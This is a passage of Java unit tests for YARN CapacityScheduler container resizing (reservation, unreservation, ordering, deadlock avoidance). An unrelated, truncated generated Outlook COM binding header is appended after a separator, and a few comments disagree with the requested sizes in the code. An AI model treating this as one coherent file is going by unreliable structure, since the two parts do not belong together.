app.getAppAttemptResourceUsage().getReserved().getMemorySize());
// Complete one container and do another allocation
am1.allocate(null, Arrays.asList(containerId2));
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
// Now container should be increased
verifyContainerIncreased(am1.allocate(null, null), containerId1, 7 * GB);
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertFalse(rmContainer1.hasIncreaseReservation());
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 7 * GB, null);
Assert.assertEquals(7 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(7 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
verifyAvailableResourceOfSchedulerNode(rm1, nm1.getNodeId(), 1 * GB);
rm1.close();
}
@Test
public void testIncreaseRequestWithNoHeadroomLeft() throws Exception {
/**
* Application has two containers running, try to increase one of them, the
* requested amount exceeds user's headroom for the queue.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate 1 container
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
// am1 asks to change container2 from 2GB to 8GB, which will exceed user
// limit
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId2,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(8 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// NM1 do 1 heartbeats
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer1 = app.getLiveContainersMap().get(containerId2);
/* Check reservation statuses */
// Increase request should *NOT* be reserved as it exceeds user limit
Assert.assertFalse(rmContainer1.hasIncreaseReservation());
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will *NOT* be updated
checkUsedResource(rm1, "default", 3 * GB, null);
Assert.assertEquals(3 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
rm1.close();
}
@Test
public void testExcessiveReservationWhenCancelIncreaseRequest()
throws Exception {
/**
* Application has two containers running, try to increase one of then, node
* doesn't have enough resource, so the increase request will be reserved.
* Check resource usage after container reserved, finish a container &
* cancel the increase request, reservation should be cancelled
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
// am1 asks to change its AM container from 1GB to 3GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(7 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// NM1 do 1 heartbeats
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer1 = app.getLiveContainersMap().get(containerId1);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer1.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer1.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 9 * GB, null);
Assert.assertEquals(9 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
// Complete one container and cancel increase request (via send a increase
// request, make target_capacity=existing_capacity)
am1.allocate(null, Arrays.asList(containerId2));
// am1 asks to change its AM container from 1G to 1G (cancel the increase
// request actually)
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(1 * GB))));
// Trigger a node heartbeat..
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
Assert.assertFalse(rmContainer1.hasIncreaseReservation());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 1 * GB, null);
Assert.assertEquals(1 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(1 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test
public void testExcessiveReservationWhenDecreaseSameContainer()
throws Exception {
/**
* Very similar to testExcessiveReservationWhenCancelIncreaseRequest, after
* the increase request reserved, it decreases the reserved container,
* container should be decreased and reservation will be cancelled
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(2 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
// am1 asks to change its AM container from 2GB to 8GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(8 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// NM1 do 1 heartbeats
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer1 = app.getLiveContainersMap().get(containerId1);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer1.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer1.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 10 * GB, null);
Assert.assertEquals(10 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(4 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
// Complete one container and cancel increase request (via send a increase
// request, make target_capacity=existing_capacity)
am1.allocate(null, Arrays.asList(containerId2));
// am1 asks to change its AM container from 2G to 1G (decrease)
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(1 * GB))));
// Trigger a node heartbeat..
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
Assert.assertFalse(rmContainer1.hasIncreaseReservation());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 1 * GB, null);
Assert.assertEquals(1 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(1 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test
public void testIncreaseContainerUnreservedWhenContainerCompleted()
throws Exception {
/**
* App has two containers on the same node (node.resource = 8G), container1
* = 2G, container2 = 2G. App asks to increase container2 to 8G.
*
* So increase container request will be reserved. When app releases
* container2, reserved part should be released as well.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
rm1.waitForContainerState(containerId2, RMContainerState.RUNNING);
// am1 asks to change its AM container from 2GB to 8GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId2,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(8 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// NM1 do 1 heartbeats
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer2 = app.getLiveContainersMap().get(containerId2);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer2.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer2.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 9 * GB, null);
Assert.assertEquals(9 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
// Complete container2, container will be unreserved and completed
am1.allocate(null, Arrays.asList(containerId2));
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
Assert.assertFalse(rmContainer2.hasIncreaseReservation());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 1 * GB, null);
Assert.assertEquals(1 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(1 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test
public void testIncreaseContainerUnreservedWhenApplicationCompleted()
throws Exception {
/**
* Similar to testIncreaseContainerUnreservedWhenContainerCompleted, when
* application finishes, reserved increase container should be cancelled
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(
rm1.waitForState(nm1, containerId2, RMContainerState.ALLOCATED,
10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
// am1 asks to change its AM container from 2GB to 8GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId2,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(8 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// NM1 do 1 heartbeats
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer2 = app.getLiveContainersMap().get(containerId2);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer2.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer2.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 9 * GB, null);
Assert.assertEquals(9 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
// Kill the application
cs.handle(new AppAttemptRemovedSchedulerEvent(am1.getApplicationAttemptId(),
RMAppAttemptState.KILLED, false));
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
Assert.assertFalse(rmContainer2.hasIncreaseReservation());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
private void allocateAndLaunchContainers(MockAM am, MockNM nm, MockRM rm,
int nContainer, int mem, int priority, int startContainerId)
throws Exception {
am.allocate(Arrays
.asList(ResourceRequest.newInstance(Priority.newInstance(priority), "*",
Resources.createResource(mem), nContainer)),
null);
ContainerId lastContainerId = ContainerId.newContainerId(
am.getApplicationAttemptId(), startContainerId + nContainer - 1);
Assert.assertTrue(rm.waitForState(nm, lastContainerId,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am.allocate(null, null);
for (int cId = startContainerId; cId < startContainerId
+ nContainer; cId++) {
sentRMContainerLaunched(rm,
ContainerId.newContainerId(am.getApplicationAttemptId(), cId));
rm.waitForContainerState(
ContainerId.newContainerId(am.getApplicationAttemptId(), cId),
RMContainerState.RUNNING);
}
}
@Test
public void testOrderOfIncreaseContainerRequestAllocation()
throws Exception {
/**
* There're multiple containers need to be increased, check container will
* be increase sorted by priority, if priority is same, smaller containerId
* container will get preferred
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 10 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
ApplicationAttemptId attemptId = am1.getApplicationAttemptId();
// Container 2, 3 (priority=3)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 3, 2);
// Container 4, 5 (priority=2)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 2, 4);
// Container 6, 7 (priority=4)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 4, 6);
// am1 asks to change its container[2-7] from 1G to 2G
List<UpdateContainerRequest> increaseRequests = new ArrayList<>();
for (int cId = 2; cId <= 7; cId++) {
ContainerId containerId =
ContainerId.newContainerId(am1.getApplicationAttemptId(), cId);
increaseRequests.add(UpdateContainerRequest
.newInstance(0, containerId,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(2 * GB)));
}
am1.sendContainerResizingRequest(increaseRequests);
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Get rmNode1
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
// assignContainer, container-4/5/2 increased (which has highest priority OR
// earlier allocated)
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
AllocateResponse allocateResponse = am1.allocate(null, null);
Assert.assertEquals(3, allocateResponse.getUpdatedContainers().size());
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 4), 2 * GB);
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 5), 2 * GB);
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 2), 2 * GB);
/* Check statuses after allocation */
// There're still 3 pending increase requests
checkPendingResource(rm1, "default", 3 * GB, null);
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 10 * GB, null);
Assert.assertEquals(10 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(10 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test
public void testIncreaseContainerRequestGetPreferrence()
throws Exception {
/**
* There're multiple containers need to be increased, and there're several
* container allocation request, scheduler will try to increase container
* before allocate new containers
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 10 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
ApplicationAttemptId attemptId = am1.getApplicationAttemptId();
// Container 2, 3 (priority=3)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 3, 2);
// Container 4, 5 (priority=2)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 2, 4);
// Container 6, 7 (priority=4)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 4, 6);
// am1 asks to change its container[2-7] from 1G to 2G
List<UpdateContainerRequest> increaseRequests = new ArrayList<>();
for (int cId = 2; cId <= 7; cId++) {
ContainerId containerId =
ContainerId.newContainerId(am1.getApplicationAttemptId(), cId);
increaseRequests.add(UpdateContainerRequest
.newInstance(0, containerId,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(2 * GB)));
}
am1.sendContainerResizingRequest(increaseRequests);
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Get rmNode1
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
// assignContainer, container-4/5/2 increased (which has highest priority OR
// earlier allocated)
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
AllocateResponse allocateResponse = am1.allocate(null, null);
Assert.assertEquals(3, allocateResponse.getUpdatedContainers().size());
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 4), 2 * GB);
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 5), 2 * GB);
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 2), 2 * GB);
/* Check statuses after allocation */
// There're still 3 pending increase requests
checkPendingResource(rm1, "default", 3 * GB, null);
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 10 * GB, null);
Assert.assertEquals(10 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(10 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test (timeout = 60000)
public void testDecreaseContainerWillNotDeadlockContainerAllocation()
throws Exception {
// create and start MockRM with our MyScheduler
MockRM rm = new MockRM() {
@Override
public ResourceScheduler createScheduler() {
CapacityScheduler cs = new MyScheduler();
cs.setConf(conf);
return cs;
}
};
rm.start();
// register a node
MockNM nm = rm.registerNode("h1:1234", 20 * GB);
// submit an application -> app1
RMApp app1 = rm.submitApp(3 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm, nm);
// making sure resource is allocated
checkUsedResource(rm, "default", 3 * GB, null);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm, app1.getApplicationId());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
// making sure container is launched
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm, containerId1);
// submit allocation request for a new container
am1.allocate(Collections.singletonList(ResourceRequest.newInstance(
Priority.newInstance(1), "*", Resources.createResource(2 * GB), 1)),
null);
// nm reports status update and triggers container allocation
nm.nodeHeartbeat(true);
// *In the mean time*, am1 asks to decrease its AM container resource from
// 3GB to 1GB
AllocateResponse response = am1.sendContainerResizingRequest(
Collections.singletonList(UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.DECREASE_RESOURCE,
Resources.createResource(GB))));
// verify that the containe resource is decreased
verifyContainerDecreased(response, containerId1, GB);
rm.close();
}
private void checkPendingResource(MockRM rm, String queueName, int memory,
String label) {
CapacityScheduler cs = (CapacityScheduler) rm.getResourceScheduler();
CSQueue queue = cs.getQueue(queueName);
Assert.assertEquals(memory,
queue.getQueueResourceUsage()
.getPending(label == null ? RMNodeLabelsManager.NO_LABEL : label)
.getMemorySize());
}
private void checkUsedResource(MockRM rm, String queueName, int memory,
String label) {
CapacityScheduler cs = (CapacityScheduler) rm.getResourceScheduler();
CSQueue queue = cs.getQueue(queueName);
Assert.assertEquals(memory,
queue.getQueueResourceUsage()
.getUsed(label == null ? RMNodeLabelsManager.NO_LABEL : label)
.getMemorySize());
}
private void verifyContainerIncreased(AllocateResponse response,
ContainerId containerId, int mem) {
List<UpdatedContainer> increasedContainers =
response.getUpdatedContainers();
boolean found = false;
for (UpdatedContainer c : increasedContainers) {
if (c.getContainer().getId().equals(containerId)) {
found = true;
Assert.assertEquals(ContainerUpdateType.INCREASE_RESOURCE,
c.getUpdateType());
Assert.assertEquals(mem,
c.getContainer().getResource().getMemorySize());
}
}
if (!found) {
Assert.fail("Container not increased: containerId=" + containerId);
}
}
private void verifyContainerDecreased(AllocateResponse response,
ContainerId containerId, int mem) {
List<UpdatedContainer> decreasedContainers =
response.getUpdatedContainers();
boolean found = false;
for (UpdatedContainer c : decreasedContainers) {
if (c.getContainer().getId().equals(containerId)) {
found = true;
Assert.assertEquals(ContainerUpdateType.DECREASE_RESOURCE,
c.getUpdateType());
Assert.assertEquals(mem,
c.getContainer().getResource().getMemorySize());
}
}
if (!found) {
Assert.fail("Container not decreased: containerId=" + containerId);
}
}
private void sentRMContainerLaunched(MockRM rm, ContainerId containerId) {
CapacityScheduler cs = (CapacityScheduler) rm.getResourceScheduler();
RMContainer rmContainer = cs.getRMContainer(containerId);
if (rmContainer != null) {
rmContainer.handle(
new RMContainerEvent(containerId, RMContainerEventType.LAUNCHED));
} else {
Assert.fail("Cannot find RMContainer");
}
}
private void verifyAvailableResourceOfSchedulerNode(MockRM rm, NodeId nodeId,
int expectedMemory) {
CapacityScheduler cs = (CapacityScheduler) rm.getResourceScheduler();
SchedulerNode node = cs.getNode(nodeId);
Assert.assertEquals(expectedMemory,
node.getAvailableResource().getMemorySize());
}
}
|
|
/* ** GENEREATED FILE - DO NOT MODIFY ** */
package com.wilutions.mslib.outlook.impl;
import com.wilutions.com.*;
@SuppressWarnings("all")
@CoClass(guid="{C091A9F7-A463-DB41-5DAE-69E7A5F7FCBC}")
